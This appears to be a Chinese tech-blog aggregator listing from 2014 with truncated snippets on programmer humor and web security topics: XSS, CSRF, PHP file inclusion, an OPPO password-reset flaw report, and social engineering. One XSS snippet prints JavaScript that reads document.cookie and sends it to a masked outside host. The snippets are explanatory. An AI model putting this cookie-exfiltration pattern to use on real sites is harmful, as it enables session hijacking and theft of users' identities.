程序员不是有一幅这样的对联吗
上联:一个项目两部电脑三餐盒饭只为四千工资搞得五脏俱损六神无主仍然七点起床八点开会处理九个漏洞十分辛苦;
下联:十年编码九年加班八面无光忙的七窍生烟到头六亲不认五体投地依旧四肢酸软三更加班只为二个臭钱一生孤苦; 横批:苦逼程序员。 其实,程序员职业生涯总结起...
分类:
其他好文 时间:
2014-05-27 01:56:31
阅读次数:
225
漏洞概要 关注数(12) 关注此漏洞 缺陷编号: WooYun-2014-53079漏洞标题:
第二次重置OPPO手机官网任意账户密码(秒改)相关厂商: 广东欧珀移动通讯有限公司 漏洞作者: 魇提交时间: 2014-03-07 23:32公开时间:
2014-04-21 23:33漏洞类型: 设.....
分类:
移动开发 时间:
2014-05-27 00:42:53
阅读次数:
386
其原理就是注入一段用户能控制的脚本或代码,并让服务端执行。文件包含漏洞可能出现在JSP、PHP、 ASP等语言中,原理都是一样的,本文只介绍PHP文件包含漏洞。
要想成功利用文件包含漏洞进行攻击,需要满足以下两个条件: 1.Web应用采用include()等文件包含函数通过动态变量的方式...
分类:
Web程序 时间:
2014-05-26 21:06:52
阅读次数:
347
不想做黑客的安全测试不是优秀的cybercop。怎么才能算是优秀的cybercop呢?那么就就必须学会或懂的黑客惯用一些手法与业内所流行的一些漏洞。加QQ群:1366117821、常见的几种攻击手段CC攻击XSS攻击CSRF攻击SQL注入攻击TCP全连接攻击框架重定向攻击惯性思维逻辑攻击WEB
Se...
分类:
其他好文 时间:
2014-05-26 21:03:10
阅读次数:
361
xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的网站出现xss漏洞,就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)等,那完了。。。
如下js获取cookie信息:
url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src=’http://www.******.c...
分类:
其他好文 时间:
2014-05-22 08:24:14
阅读次数:
273
OAuth 漏洞预警 (OAuth平台redirect_uri 漏洞), 说说如何修补...
分类:
其他好文 时间:
2014-05-21 14:37:04
阅读次数:
262
摘要:因安装不安全的手机App而导致的用户隐私被泄露的事件屡见报端,致使手机App频现“偷窥门”,让越来越多的人为之心惊胆跳。
安卓平台海量的免费应用吸引了越来越多的用户,但其开放性也给用户的隐私安全带来隐患,因安装不安全的手机App导致隐私泄露的事件屡屡被曝光。据统计,5%的免费移动应用都含有侵犯用户隐私的广告软件。这些广告软件可以更改用户手机设置、发送通知消息、私自访问用户身份信息等等。...
分类:
移动开发 时间:
2014-05-21 14:30:34
阅读次数:
280
一般我们都是利用WebRequest这个类来向服务器进行数据的POST,不过很多情况下相应的服务器都有验证,看你是不是登陆,是不是来自同一个域,这些都简单,我们可以更改其属性来达到欺骗服务器。不过如果服务器做了CSRF控制,那我们怎么办?不熟悉CSRF的可以问下G哥此为何物,这里简单介绍下。CSRF...
分类:
Web程序 时间:
2014-05-21 03:34:36
阅读次数:
531
社会工程学,和心理学属于一系。俗称社工。社工与特工不同,只是出于分析能力较高。知名度较高的,例如凯文米特尼克。社工需要大量的知识。例如,从一张照片可以得到你所在的位置,拍照的季节和时间等等。有人说社工就是欺骗、欺诈,但我不这样认为。社工主要是与计算机有关。一个社工能力较强的人,根本不需要漏洞或者渗透...
分类:
其他好文 时间:
2014-05-19 19:55:00
阅读次数:
221
Web安全测试之XSSXSS 全称(Cross Site Scripting) 跨站脚本攻击,
是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript),
当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的. 比如获取用户的Cookie,导航到恶意网...
分类:
Web程序 时间:
2014-05-17 20:20:05
阅读次数:
371
